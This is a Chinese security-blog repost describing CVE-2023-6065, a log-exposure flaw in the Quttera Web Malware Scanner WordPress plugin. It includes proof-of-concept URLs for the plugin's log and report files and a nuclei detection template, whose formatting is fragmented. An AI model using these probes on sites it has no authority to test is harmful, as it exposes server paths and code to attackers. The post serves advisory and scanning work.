01 漏洞名称
02 漏洞影响
Qttera Web 恶意软件扫描程序 < 3.4.2.1
03 漏洞描述
Quttera Web恶意软件扫描器3.4.2.1之前的WordPress插件不限制访问详细的扫描日志,这允许恶意行为者发现本地路径和网站代码的部分。
04 漏洞复现
POC
http:
/
/your_site/wordpress
/wp-content/plugins
/quttera-web-malware-scanner/runtime
.log
http:
/
/your_site/wordpress
/wp-content/plugins
/quttera-web-malware-scanner/quttera
_wp_report.txt
05 nuclei poc
poc文件内容如下
id
: CVE-2023-6065
info
:
name
:
Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure
author
:
Kazgangap
severity
:
medium
description
:
|
The
Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code
remediation
:
Fixed in 3.4.2.1
reference
:
https://nvd.nist.gov/vuln/detail/CVE-2023-6065
https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5
https://wordpress.org/plugins/quttera-web-malware-scanner/
classification
:
:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
:
5.3
:
CVE-2023-6065
:
0.00046
:
0.16199
cpe
:
cpe:2.3:a:quttera:quttera_web_malware_scanner:*:*:*:*:*:wordpress:*:*
metadata
:
verified
:
true
:
1
vendor
:
quttera
product
:
quttera_web_malware_scanner
framework
:
wordpress
tags
:
cve,cve2023,wp-plugin,quttera,wpscan,
http
:
method: GET
path
:
"{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"
:
and
matchers
:
type: word
part
:
body
words
:
"Website Malware Scan Report"
"Scanned Website"
"Scan type"
condition
:
and
type: word
part
:
header
words
:
"text/plain"
type: status
status
:
200
# digest: 4a0a0047304502207d57bed9f86a5c3790fab7c7ad97d0ce2a40a3769cadf8c03db9fe296816f3dc022100a72b53af19a2d49d7d48f413a62219b54ef121d6c17aa1c35758f4608f69b95f:922c64590222798bb761d5b6d8e72950
06 修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2023-6065漏洞复现(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论